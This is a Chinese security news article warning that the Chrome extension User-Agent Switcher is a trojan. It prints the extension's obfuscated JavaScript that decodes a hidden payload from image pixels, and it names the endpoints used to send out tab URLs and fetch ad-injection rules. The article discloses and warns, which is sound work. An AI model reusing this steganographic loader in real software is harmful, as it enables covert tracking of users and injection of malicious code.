回归最本质的信息安全

Chrome 的插件 User-Agent Switcher 被证明是木马,尽快卸载!

2017年9月10日发布

40,651
3
10

导语:又是周末,又是深夜,又出大事了。苦逼的开发人员和媒体工作者又要加班了……

timg (1).jpeg

又是周末,又是深夜,又出大事了。苦逼的开发人员和媒体工作者又要加班了……

今天出事的是一个名为User-Agent Switcher的插件,在chrome 商店里拥有45万用户,然而它却是一个木马!

User-Agent Switcher插件是一款可以使用Chrome浏览器访问网站的时候来制造一种其他浏览器正在访问该网站的一种“假象”。在开发者需要使用多种浏览器来对网站进行模拟访问的时候可以使用User-Agent Switcher插件在Chrome浏览器中完成全部的请求,用户只需要在谷歌浏览器中安装User-Agent Switcher插件就可以在不离开Chrome的过程中使用多种浏览器的代理模式来访问当前的网站。

所以,这款插件被大部分开发者喜爱。不幸的是,这款被人人热捧的插件中却暗藏恶意代码,分分钟可以在你的电脑中种植木马。

timg.jpeg

为了绕过 chrome 的审核策略,他把恶意代码隐藏在了 promo.jpg 里

在background.js 的第 80 行,从这个图片里解密出恶意代码并执行

t.prototype.Vh = function(t, e) {            if ("" === '../promo.jpg') return "";            void 0 === t && (t = '../promo.jpg'), t.length && (t = r.Wk(t)), e = e || {};
            var n = this.ET,
                i = e.mp || n.mp,
                o = e.Tv || n.Tv,
                h = e.At || n.At,
                a = r.Yb(Math.pow(2, i)),
                f = (e.WC || n.WC, e.TY || n.TY),
                u = document.createElement("canvas"),
                p = u.getContext("2d");            if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return "";
            e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0);
            var c = p.getImageData(0, 0, u.width, u.height),
                d = c.data,
                g = [];            if (c.data.every(function(t) {                    return 0 === t
                })) return "";
            var m, s;            if (1 === o)                for (m = 3, s = !1; !s && m < d.length && !s; m += 4) s = f(d, m, o), s || g.push(d[m] - (255 - a + 1));
            var v = "",
                w = 0,
                y = 0,
                l = Math.pow(2, h) - 1;            for (m = 0; m < g.length; m += 1) w += g[m] << y, y += i, y >= h && (v += String.fromCharCode(w & l), y %= h, w = g[m] >> i - y);            return v.length < 13 ? "" : (0 !== w && (v += String.fromCharCode(w & l)), v)
        }

会把你打开的每个 tab 的 url 等信息加密发送到 https://uaswitcher.org/logic/page/data

另外还会从 http://api.data-monitor.info/api/bhrule?sub=116 获取推广链接的规则,打开符合规则的网站时,会在页面插入广告甚至恶意代码.

根据 threatbook 上的信息( https://x.threatbook.cn/domain/api.data-monitor.info ),我估计下面的几个插件都是这个作者的作品..

https://chrome.google.com/webstore/detail/nenhancer/ijanohecbcpdgnpiabdfehfjgcapepbm

https://chrome.google.com/webstore/detail/allow-copy/abidndjnodakeaicodfpgcnlkpppapah

https://chrome.google.com/webstore/detail/%D1%81%D0%BA%D0%B0%D1%87%D0%B0%D1%82%D1%8C-%D0%BC%D1%83%D0%B7%D1%8B%D0%BA%D1%83-%D0%B2%D0%BA%D0%BE%D0%BD%D1%82%D0%B0%D0%BA%D1%82%D0%B5/hanjiajgnonaobdlklncdjdmpbomlhoa

https://chrome.google.com/webstore/detail/aliexpress-radar/pfjibkklgpfcfdlhijfglamdnkjnpdeg

本文参考来源于V2EX,如若转载,请注明原文地址: http://www.4hou.com/info/news/7607.html

点赞 10
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

Cindy

Cindy

嘶吼编辑

发私信

发表评论

    vvex 2017-09-12 09:02

    参考了v2ex的哪篇文章呢?

    qwer 2017-09-11 23:07

    具体是指这个插件吗
    https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake?hl=zh-CN
    文章里何不加个图片…

    color-X
    color-X 2017-09-11 11:18

    卸载卸载